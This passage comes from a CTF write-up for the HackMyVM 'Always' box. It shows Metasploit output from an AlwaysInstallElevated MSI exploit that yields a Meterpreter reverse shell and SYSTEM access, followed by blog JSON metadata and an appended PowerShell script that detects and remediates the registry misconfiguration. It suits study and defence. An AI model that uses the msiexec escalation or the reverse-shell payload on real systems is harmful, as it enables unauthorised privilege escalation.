172.20.10.3\n[+] Deleted C:\\Users\\FTPUSE~1.ALW\\AppData\\Local\\Temp\\jiCwTOfrMvJ.msi\n[*] Meterpreter session 2 opened (172.20.10.8:4444 -&gt; 172.20.10.3:49446) at 2024-12-22 08:31:25 -0500\n\nmeterpreter &gt; shell\nProcess 2668 created.\nChannel 2 created.\nMicrosoft Windows [S\ufffdr\ufffdm 6.1.7601]\nTelif Hakk\ufffd (c) 2009 Microsoft Corporation. T\ufffdm haklar\ufffd sakl\ufffdd\ufffdr.\n\nC:\\Windows\\system32&gt;whoami\nwhoami\nnt authority\\system<\/code><\/pre>\n<p>\u5df2\u7ecf\u62ff\u5230root\u4e86\uff0c\u63a5\u4e0b\u6765\u6b63\u5e38\u627eflag\u5c31\u884c\u4e86\uff0c\u8981\u6709\u8010\u5fc3\uff01<\/p>\n<pre><code class=\"language-bash\">HMV{You_Found_Me!}  \nHMV{White_Flag_Raised}<\/code><\/pre>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/gaznetsystems.com\/Hackmyvm\/Easy\/Always\">https:\/\/gaznetsystems.com\/Hackmyvm\/Easy\/Always<\/a><\/p>\n<p><a href=\"https:\/\/medium.com\/@josemlwdf\/always-2fe441d13d50\">https:\/\/medium.com\/@josemlwdf\/always-2fe441d13d50<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Always \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always] \u2514\u2500$ rus 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-823","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/823","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=823"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/823\/revisions"}],"predecessor-version":[{"id":824,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/823\/revisions\/824"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=823"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=823"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=823"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
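The Metasploit module in the write-up above works only because the AlwaysInstallElevated policy is enabled on the box: when the DWORD is 1 in both the machine (HKLM) and the user (HKCU) policy key, Windows Installer runs any MSI a standard user installs as NT AUTHORITY\SYSTEM. The module uploaded an MSI payload to the FTP user's Temp directory, ran it, and deleted it, which is why jiCwTOfrMvJ.msi appears and disappears in the output. The PowerShell below is an added example, not code from the original write-up or from the Metasploit module: it performs the precondition check by hand (both hives, not just one), and carries the remediation alongside it. The function names Get-AlwaysInstallElevatedState, Test-AlwaysInstallElevated and Disable-AlwaysInstallElevated are ours; it is written for Windows PowerShell 2.0, the default on Windows 7 SP1 like the target here.

```powershell
# Added example (not from the original write-up or the Metasploit module):
# check the precondition exploit/windows/local/always_install_elevated relies on.
# Windows Installer only runs MSIs as NT AUTHORITY\SYSTEM for a standard user when
# AlwaysInstallElevated is 1 in BOTH the machine (HKLM) and user (HKCU) policy keys.
# Written for Windows PowerShell 2.0 (the Windows 7 default), so no [PSCustomObject].

$InstallerPolicyKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    # One object per hive; a missing key or value counts as 0 (policy not set).
    foreach ($key in $InstallerPolicyKeys) {
        $item = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $value = 0
        if ($null -ne $item) { $value = [int]$item.AlwaysInstallElevated }
        New-Object PSObject -Property @{
            Hive  = $key.Split(':')[0]
            Key   = $key
            Value = $value
        }
    }
}

function Test-AlwaysInstallElevated {
    # $true only when every hive reports 1; the value in one hive alone is not exploitable.
    $states = @(Get-AlwaysInstallElevatedState)
    $notSet = @($states | Where-Object { $_.Value -ne 1 })
    return ($states.Count -eq $InstallerPolicyKeys.Count) -and ($notSet.Count -eq 0)
}

function Disable-AlwaysInstallElevated {
    # Remediation, run from an administrative shell: set both values to 0.
    # Deleting the values has the same effect, because the default is disabled.
    foreach ($key in $InstallerPolicyKeys) {
        if (Test-Path $key) {
            Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

# Report the state of each hive, then the overall verdict.
Get-AlwaysInstallElevatedState | Format-Table Hive, Value -AutoSize

if (Test-AlwaysInstallElevated) {
    Write-Output 'VULNERABLE: AlwaysInstallElevated=1 in HKLM and HKCU; msiexec /quiet /qn /i <package>.msi runs the package as SYSTEM.'
} else {
    Write-Output 'Not exploitable: the policy is absent or 0 in at least one hive.'
}
```

From the cmd.exe shell the write-up lands in, the same check is `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated` followed by its HKCU twin; both must come back as 0x1. Disable-AlwaysInstallElevated is deliberately not called from the script body; run it from an elevated prompt, or set "Always install with elevated privileges" to Disabled under both Computer Configuration and User Configuration > Administrative Templates > Windows Components > Windows Installer, which writes the same two values through Group Policy.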
